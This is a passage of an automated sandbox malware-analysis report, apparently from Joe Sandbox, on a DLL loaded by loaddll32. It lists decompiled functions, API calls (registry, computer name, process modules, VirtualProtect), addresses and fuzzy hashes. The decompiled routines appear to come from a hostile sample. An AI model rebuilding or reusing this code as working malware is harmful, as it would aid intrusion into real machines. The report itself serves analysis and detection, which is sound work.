										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x1c1a2d8; // 0x55d5a8
											_t23 = _t76 + 0x1c1b42c; // 0x21789d4
											_t24 = _t76 + 0x1c1b45c; // 0x4c96be40
											_t105 =  *0x1c1a114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x1c1a2d8; // 0x55d5a8
													_t67 = _v28;
													_t40 = _t99 + 0x1c1b41c; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                0x01c1640a
                0x01c1640c
                0x01c16413
                0x01c16414
                0x01c16415
                0x01c16416
                0x01c1641c
                0x01c16421
                0x01c1642b
                0x01c16432
                0x01c16438
                0x01c1643c
                0x01c16442
                0x01c1644a
                0x01c1644b
                0x01c16450
                0x01c16451
                0x01c16453
                0x01c16456
                0x01c16457
                0x01c16458
                0x01c1645e
                0x01c164f3
                0x01c164f8
                0x01c164ff
                0x01c16509
                0x01c1650f
                0x01c16511
                0x01c16517
                0x00000000
                0x01c16464
                0x01c16464
                0x01c1646b
                0x01c16474
                0x01c16478
                0x01c1647e
                0x01c16481
                0x01c164e8
                0x00000000
                0x01c16483
                0x01c16483
                0x01c1651a
                0x01c1651c
                0x00000000
                0x00000000
                0x01c16489
                0x01c16489
                0x01c16489
                0x01c16490
                0x01c16496
                0x01c1649b
                0x01c164a3
                0x01c164a4
                0x01c164a5
                0x01c164a7
                0x01c164ab
                0x01c164af
                0x00000000
                0x01c164b1
                0x01c164b5
                0x01c164ba
                0x01c164c1
                0x01c164d1
                0x01c164d3
                0x01c164d9
                0x01c164de
                0x01c1651e
                0x01c1651e
                0x01c1652b
                0x01c1652f
                0x01c16534
                0x01c1653a
                0x01c1653f
                0x01c16549
                0x01c1654b
                0x01c16551
                0x01c16551
                0x01c16554
                0x01c1655a
                0x00000000
                0x00000000
                0x00000000
                0x01c164de
                0x00000000
                0x01c164e0
                0x01c164e0
                0x01c164e1
                0x00000000
                0x01c164e6
                0x01c16483
                0x01c16481
                0x01c16478
                0x01c1655d
                0x01c1655d
                0x01c16563
                0x01c16563
                0x01c1656c

                APIs
                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,021789D4,01C12D5F,?,?,?,?,?,?,?,?,?,?,?,01C12D5F), ref: 01C164CB
                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,021789D4,01C12D5F,?,?,?,?,?,?,?,01C12D5F,00000000,00000000,00000000,006D0063), ref: 01C16509
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: QueryServiceUnknown_
                • String ID:
                • API String ID: 2042360610-0
                • Opcode ID: a8c60d7230d3e282de8fd9a0213b5b9db3c19c8088027816b433c238b8af2930
                • Instruction ID: ce89752cfd7138160ca9c70e1b9f519080aabdc2bc99c0c6818e89792957efa8
                • Opcode Fuzzy Hash: a8c60d7230d3e282de8fd9a0213b5b9db3c19c8088027816b433c238b8af2930
                • Instruction Fuzzy Hash: 22513C76940129EFCB00CFE8C888DAEB7B9FF4A714B048558EA05EB215D671ED05DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C151C7 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E01C151C7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E01C12C2D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x1c1a2d8; // 0x55d5a8
						_t20 = _t68 + 0x1c1b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E01C16AEB(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                0x01c151cd
                0x01c151d0
                0x01c151e0
                0x01c151e9
                0x01c151ed
                0x01c152bb
                0x01c152c1
                0x01c152c1
                0x01c15207
                0x01c1520c
                0x01c15210
                0x01c15216
                0x01c1521b
                0x01c15222
                0x01c15231
                0x01c15231
                0x01c15235
                0x01c15237
                0x01c15243
                0x01c1524e
                0x01c15259
                0x01c1525d
                0x01c15267
                0x01c1526b
                0x01c1526d
                0x01c15272
                0x01c15279
                0x01c15289
                0x01c15289
                0x01c15272
                0x01c1526b
                0x01c1528b
                0x01c15290
                0x01c15295
                0x01c15295
                0x01c1529b
                0x01c152a1
                0x01c152a6
                0x01c152a6
                0x01c152ab
                0x01c152b0
                0x01c152b0
                0x01c152ab
                0x01c15235
                0x01c152b2
                0x01c152b8
                0x00000000

                APIs
                  • Part of subcall function 01C12C2D: SysAllocString.OLEAUT32(80000002), ref: 01C12C84
                  • Part of subcall function 01C12C2D: SysFreeString.OLEAUT32(00000000), ref: 01C12CE9
                • SysFreeString.OLEAUT32(?), ref: 01C152A6
                • SysFreeString.OLEAUT32(01C11C26), ref: 01C152B0
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: 0735b7167c4ecaab9bcd6e20a9d87f1b796ed0269f98dfc9e3285e43adffbdba
                • Instruction ID: e3d73cb44074530cee4c4071894b16b68e38abb5938c3ff3be412ab288567606
                • Opcode Fuzzy Hash: 0735b7167c4ecaab9bcd6e20a9d87f1b796ed0269f98dfc9e3285e43adffbdba
                • Instruction Fuzzy Hash: 7F313872900119EFCB21DF98C888CDBBBB9FBCA6407148658F9069B214D271DD91EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C8FFC Relevance: 3.1, APIs: 2, Instructions: 80registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CD0E6: RegCreateKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD0FB
                  • Part of subcall function 046CD0E6: lstrlen.KERNEL32(04C9B7F0,00000000,00000000,046ED06E,?,?,?,046C902F,00000001,?), ref: 046CD124
                • RegQueryValueExA.KERNELBASE(?,?,00000000,?,046ED068,?,00000001,?,?,046ED06E,?,?,?,?), ref: 046C9050
                • RegCloseKey.ADVAPI32(?,?,046ED06E,?,?,?,?), ref: 046C9099
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseCreateQueryValuelstrlen
                • String ID:
                • API String ID: 971780412-0
                • Opcode ID: aa89bc3b561ba19684fcffd57c97a9776beeb21175397b82beb20422fe3c1902
                • Instruction ID: 82780dba31abf0fac64c78a5ce0342cb627019d8439d853b47ee71306ce54bff
                • Opcode Fuzzy Hash: aa89bc3b561ba19684fcffd57c97a9776beeb21175397b82beb20422fe3c1902
                • Instruction Fuzzy Hash: 6F3151B1E00219EFDB21DF96E8409AEBBF8EB04750F14506EE514AB240F7756E85CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C13318 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                Download Yara Rule
                C-Code - Quality: 50%
                			E01C13318(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x1c1a2d8; // 0x55d5a8
				_t2 = _t42 + 0x1c1b46c; // 0x20400
				_push(0);
				_push(__eax); // executed
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x1c1a2d8; // 0x55d5a8
					_t6 = _t45 + 0x1c1b48c; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x1c1a2d8; // 0x55d5a8
							_t30 = _v8;
							_t12 = _t48 + 0x1c1b47c; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                0x01c13324
                0x01c13325
                0x01c1332b
                0x01c13332
                0x01c13334
                0x01c13338
                0x01c1333c
                0x01c1333e
                0x01c13347
                0x01c1334d
                0x01c13355
                0x01c13357
                0x01c1335b
                0x01c1335d
                0x01c1336a
                0x01c1336e
                0x01c13373
                0x01c13379
                0x01c1337e
                0x01c13386
                0x01c13388
                0x01c1338a
                0x01c13390
                0x01c13390
                0x01c13393
                0x01c13399
                0x01c13399
                0x01c1339c
                0x01c133a2
                0x01c133a2
                0x01c133a9

                APIs
                • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01C13355
                • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 01C13386
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Interface_ProxyQueryUnknown_
                • String ID:
                • API String ID: 2522245112-0
                • Opcode ID: c5a010a2a7384cf099e7ba819261419b744e87c59b20a1c1041cdfd55ea3043f
                • Instruction ID: 91f0f65dac45171eeaee1a5c766524ef3a149a7fd1d3f2418fa010c8daab52e7
                • Opcode Fuzzy Hash: c5a010a2a7384cf099e7ba819261419b744e87c59b20a1c1041cdfd55ea3043f
                • Instruction Fuzzy Hash: 12217F75A4061AEFCB00CFA4C888D9AB779FF89714B108684E905DB325DB31EE01CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CEF8C Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,005A95A8,00000003,00000000,00000000), ref: 046CEFBC
                • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,005A95A8,00000003,00000000), ref: 046CF003
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                • String ID:
                • API String ID: 552344955-0
                • Opcode ID: 1040831b51932913c9687d3bc29cf371b423165022615eb4db0aea8cbe0ed539
                • Instruction ID: 8d7102c29230801e8efdea5d56cadef04b4d695b5d4eade42910db7a43b208c3
                • Opcode Fuzzy Hash: 1040831b51932913c9687d3bc29cf371b423165022615eb4db0aea8cbe0ed539
                • Instruction Fuzzy Hash: ED11A971A00208FBDB219F99C884BBEB7B9EF90799F10405DE51097340F7B5EA01DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C9677 Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,046D4776,69B25F44,?,?,00000000), ref: 046C96B4
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,046D4776), ref: 046C9715
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystem
                • String ID:
                • API String ID: 892271797-0
                • Opcode ID: 1d00aa4630d274fe8f429bee22e935d2a60313ae2f83140e5569fe2776c00707
                • Instruction ID: a3b26a203b6f40a83fffc364c183ab090d64c86f0c05888cfac26cb04baaacd2
                • Opcode Fuzzy Hash: 1d00aa4630d274fe8f429bee22e935d2a60313ae2f83140e5569fe2776c00707
                • Instruction Fuzzy Hash: 7D110DB6900209EBDB01DFA1D948AAEB7FCEB08305F101469E505E7244F775AB44DF65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C15760 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                Download Yara Rule
                APIs
                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 01C15788
                  • Part of subcall function 01C151C7: SysFreeString.OLEAUT32(?), ref: 01C152A6
                • SafeArrayDestroy.OLEAUT32(?), ref: 01C157D5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ArraySafe$CreateDestroyFreeString
                • String ID:
                • API String ID: 3098518882-0
                • Opcode ID: b570c90031397ac876fb64035cc4cb63e40b08a353617f7b58483c7f74e8bd2e
                • Instruction ID: 4e5005d983863d10455a5c6fd6e6f34c6aca65e2094cdec3a2258a5dc41b0d41
                • Opcode Fuzzy Hash: b570c90031397ac876fb64035cc4cb63e40b08a353617f7b58483c7f74e8bd2e
                • Instruction Fuzzy Hash: F3118232940209FFDB11DF94C845EEEBBB8FB19310F008015FA04E6160D770DA159F91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C171E5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C171E5(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E01C155E9(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x1c1a290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E01C1167E(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                0x01c171e5
                0x01c171ed
                0x01c17204
                0x01c1721f
                0x01c17223
                0x01c17228
                0x01c1722a
                0x01c1723a
                0x01c17246
                0x01c1722c
                0x01c1722c
                0x01c1722f
                0x01c17234
                0x01c17234
                0x01c1722a
                0x01c1724c
                0x01c17250
                0x01c17250
                0x01c171f9
                0x01c171fe
                0x01c17202
                0x00000000
                0x00000000
                0x00000000

                APIs
                  • Part of subcall function 01C1167E: SysFreeString.OLEAUT32(00000000), ref: 01C116E4
                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,01C15D33,?,004F0053,021793E0,00000000,?), ref: 01C17246
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Free$HeapString
                • String ID: Ut
                • API String ID: 3806048269-8415677
                • Opcode ID: 5ed8e66018905c6df6d823115b2d13c434aa4cf780fd8e1f0a4d7f7c0b1f229c
                • Instruction ID: d893f866fd5a1337bf9fc1b31d9a8327f8055e05c23ed24312be2e8fba6098ef
                • Opcode Fuzzy Hash: 5ed8e66018905c6df6d823115b2d13c434aa4cf780fd8e1f0a4d7f7c0b1f229c
                • Instruction Fuzzy Hash: 6401E832181259FBDB229F88DC05FEA7B65FB16790F048015FE099A128C731DA61EB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C14A14 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E01C14A14(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E01C12114(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E01C12C11(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                0x01c14a19
                0x01c14a24
                0x01c14a26
                0x01c14a2c
                0x01c14a2e
                0x01c14a33
                0x01c14a3c
                0x01c14a40
                0x01c14a49
                0x01c14a4d
                0x01c14a5c
                0x01c14a4f
                0x01c14a50
                0x01c14a55
                0x01c14a55
                0x01c14a4d
                0x01c14a40
                0x01c14a65

                APIs
                • GetComputerNameExA.KERNELBASE(00000003,00000000,?,?,00000000,?,?,01C17553), ref: 01C14A2C
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetComputerNameExA.KERNELBASE(00000003,00000000,?,?,?,?,01C17553), ref: 01C14A49
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ComputerHeapName$AllocateFree
                • String ID:
                • API String ID: 187446995-0
                • Opcode ID: 3ae2dd8408a78e85615925576fa5b8a9a074e3f5bd44b89535d636b0f785ca7a
                • Instruction ID: b9b57f4ec21eeb55a704811df71cf7e0851e9805df745b9b6ec18ac60030f460
                • Opcode Fuzzy Hash: 3ae2dd8408a78e85615925576fa5b8a9a074e3f5bd44b89535d636b0f785ca7a
                • Instruction Fuzzy Hash: 93F03077684109FAEB11D6AA9D01EAB66BCDBC7A50F210055AA05D7144EA70DB02A770
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C15E26 Relevance: 3.0, APIs: 2, Instructions: 35stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C15E26(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E01C12114(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x1c1a2d8; // 0x55d5a8
					_t5 = _t11 + 0x1c1ba50; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x1c1a2d8; // 0x55d5a8
					_t6 = _t14 + 0x1c1b8fc; // 0x6d0063
					_t16 = E01C16096(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E01C12C11(_t20);
				}
				return _t18;
			}









                0x01c15e3c
                0x01c15e40
                0x01c15e80
                0x01c15e42
                0x01c15e46
                0x01c15e4d
                0x01c15e55
                0x01c15e5b
                0x01c15e66
                0x01c15e6f
                0x01c15e75
                0x01c15e77
                0x01c15e77
                0x01c15e85

                APIs
                • lstrlenW.KERNEL32(74E5F710,00000000,?,01C161EA,00000000,?,74E5F710,00000000,74E5F730), ref: 01C15E2C
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • wsprintfW.USER32 ref: 01C15E55
                  • Part of subcall function 01C16096: memset.NTDLL ref: 01C160B9
                  • Part of subcall function 01C16096: GetLastError.KERNEL32 ref: 01C16105
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                • String ID:
                • API String ID: 1672627171-0
                • Opcode ID: 1941e3186ac45aa789d59bbfe626f5c1a89a5be72b60207af14b5e256adda2d1
                • Instruction ID: 81c2de0389d64d3e9f6927a13e00c8c103d17b9e24d21b6842bbcb107bc70f00
                • Opcode Fuzzy Hash: 1941e3186ac45aa789d59bbfe626f5c1a89a5be72b60207af14b5e256adda2d1
                • Instruction Fuzzy Hash: 33F09032981225EFD6219BA99C48F9B37ADEF97610F058011FA09C7119CA74D905EB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D8E5E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D8E68
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046D8EA4
                  • Part of subcall function 046E0B4D: lstrlen.KERNEL32(?,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046E0B9A
                  • Part of subcall function 046E0B4D: VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0BAC
                  • Part of subcall function 046E0B4D: lstrcpy.KERNEL32(00000000,?), ref: 046E0BBB
                  • Part of subcall function 046E0B4D: VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0BCC
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                • String ID:
                • API String ID: 1872894792-0
                • Opcode ID: 102cbe6717c43268a41686ab5f2680d995603e7185d3a30bb4a79f7b995b8186
                • Instruction ID: 39ecc524c679bd4c21f3b668753d1b2813900f0b9e438620efe2df463bc9890f
                • Opcode Fuzzy Hash: 102cbe6717c43268a41686ab5f2680d995603e7185d3a30bb4a79f7b995b8186
                • Instruction Fuzzy Hash: DDF0E576602325DFA7207F6AD888876F7E8EB99218305414EE95557301FBB37C018AE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C16D32 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C16D32(signed int __edx, void* __edi, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;

				_t11 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x1c1a290 = _t3;
				if(_t3 == 0) {
					_t9 = 8;
					return _t9;
				}
				 *0x1c1a180 = GetTickCount();
